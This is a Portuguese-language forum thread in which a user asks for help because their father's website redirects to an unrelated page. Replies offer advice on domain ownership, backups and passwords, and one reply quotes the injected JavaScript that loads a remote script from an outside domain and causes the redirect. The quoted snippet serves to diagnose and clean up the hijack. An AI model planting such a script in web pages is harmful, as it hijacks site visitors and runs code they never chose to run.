Ir ao conteúdo
  • Cadastre-se

Meu site fica sendo redirecionado para outro site sem sentido algum


Posts recomendados

Boa tarde pessoal, então, o que acontece é que do nada o site do meu pai parou de funcionar, ele funcionava normalmente por anos dando só alguns probleminhas vez ou outra, mas era um rapaz que meu pai pagava que configurava tudo para ele e fazia a manutenção caso desse algum problema. Depois de um tempo ele parou de fazer esse trabalho e meu pai continuou fazendo. Sendo que agora, aparentemente do nada, o site está sendo redirecionado para outro.

 

Ele chega a abrir o site por questões de segundo e depois muda para esse "Atendentevirtualnoseusite" nada a ver.

 

O host que meu pai paga é da Mocha Host e o domínio já está pago por 5 anos de acordo com ele, não sei se isso tem alguma relação.

 

Aqui é o site e ele abre por alguns segundos www.valkacercas.com.br

 

image.thumb.png.1928288afe4b73c5c22bb16a3169d567.png

 

E aqui é o que ele abre logo em seguida:

 

image.thumb.png.70f495e2c3537c772b45c77fdfcb619b.png

 

Esse aqui é o painel de controle que configura o site sendo que eu não manjo muito, será que da pra fazer o site voltar ao normal por aqui?

 

Meu pai acha que alguém derrubou o site dele, algum hacker, não sei se pode ter sido isso mas ficaria muito agradecido se alguém pudesse me ajudar, valeu!

 

image.thumb.png.1687bfdbd300b3854650d77d3fd3050f.png

Link para o comentário
Compartilhar em outros sites

  • Membro VIP

Minha esposa tinha um site em que pagava pelo domínio neste registro.br:

1.thumb.jpg.0116a1320f4bccf6909b467f0550eb81.jpg

Pesquisando o seu valkacercas aparece como não disponível para registro e significa que alguém tem o domínio dele.

Ela tinha uma conta e podia checar a propriedade e os pagamentos. Eu imagino que seu pai também deva ter uma conta no registro.br e possa checar se o domínio ainda é dele ou se outra pessoa se apossou.

A segunda parte era uma empresa que administrava o domínio dela, ficava tudo na mão deles e quando ela mudou de empresa, a nova lhe mandou um link e ela registrou o link no site do registro.br, a partir dai a página mudou do administrador antigo para o novo.

Este é o básico que eu sei à respeito.

Link para o comentário
Compartilhar em outros sites

 Boa tarde! Ao que tudo indica e parece ser o seu caso, pode ser que a pessoa que fazia o suporte lhe sacaneou, sugiro voce a ir onde foi registrado o domínio (não provedor de hospedagem do site) e verifique como esta o nome no painel do site (www.seusite.com.br), sugiro também, que mude todas as senhas e deixe salvo num local que possa ser usado por voce.

  • Curtir 1
Link para o comentário
Compartilhar em outros sites

Olhando o site, com javascript desabilitado, ele não muda para o outro site, portanto é um problema relacionado com os scripts. Se houver um backup do site de antes dessas alterações, pode tentar restaurar e ver se resolve. Se o site usa banco de dados, como para guardar os artigos e páginas, pode ser que o script esteja no BD, também restaurar um backup anterior do BD resolveria.

 

Após arrumar isso, seria bom trocar as senhas por outras melhores e ver se tem alguma brecha de segurança no site, normalmente se ele usa PHP com Banco de Dados costuma ter uma ou outra coisa, se o site foi feito de maneira mais "artesanal".

 

[edit] Enquanto isso, eu trocaria o site para um estático (index.html) com conteúdo indicando manutenção do site e, se não souberem o que fazer, contratar o rapaz ou outro de confiança para arrumar.

 

[edit2]O trecho que causa o problema é esse aqui, provavelmente vai encontrar em outros pontos do site, já passei por algo assim:

 

<script type="text/javascript">
                            var varHash = "27d19eca41d499ce7c7a1f25ed172f4506ec1643";
                            (function() { 
                            var atendV = document.createElement('script'); atendV.type = 'text/javascript'; atendV.async = true;
                             atendV.src =  'http://www.atendentevirtualnoseusite.com/js/script-atendente.js';
                              var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(atendV, s);
                            })();
                            </script>

 

Provavelmente vão precisar contratar alguém sim, quase certo tem vulnerabilidade no site... Boa sorte.

  • Curtir 1
Link para o comentário
Compartilhar em outros sites

@Pincipi Entendi, muito obrigado pela ajuda

 

@dudaskank Caramba, não parece algo simples de se resolver para quem não tem muito conhecimento nessa área, vou ver se consigo alguma ajuda, obrigado pelas resposta.

@ramonk8 Ok vou dar uma olhada e fazer isso mesmo obrigado pela ajuda.

 

  • Curtir 1
Link para o comentário
Compartilhar em outros sites

Crie uma conta ou entre para comentar

Você precisa ser um usuário para fazer um comentário

Criar uma conta

Crie uma nova conta em nossa comunidade. É fácil!

Crie uma nova conta

Entrar

Já tem uma conta? Faça o login.

Entrar agora

Sobre o Clube do Hardware

No ar desde 1996, o Clube do Hardware é uma das maiores, mais antigas e mais respeitadas comunidades sobre tecnologia do Brasil. Leia mais

Direitos autorais

Não permitimos a cópia ou reprodução do conteúdo do nosso site, fórum, newsletters e redes sociais, mesmo citando-se a fonte. Leia mais

×
×
  • Criar novo...

 

GRÁTIS: ebook Redes Wi-Fi – 2ª Edição

EBOOK GRÁTIS!

CLIQUE AQUI E BAIXE AGORA MESMO!